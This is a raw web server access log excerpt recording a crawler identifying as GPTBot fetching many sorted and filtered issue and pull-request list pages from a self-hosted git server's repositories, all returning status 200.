"https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10047] 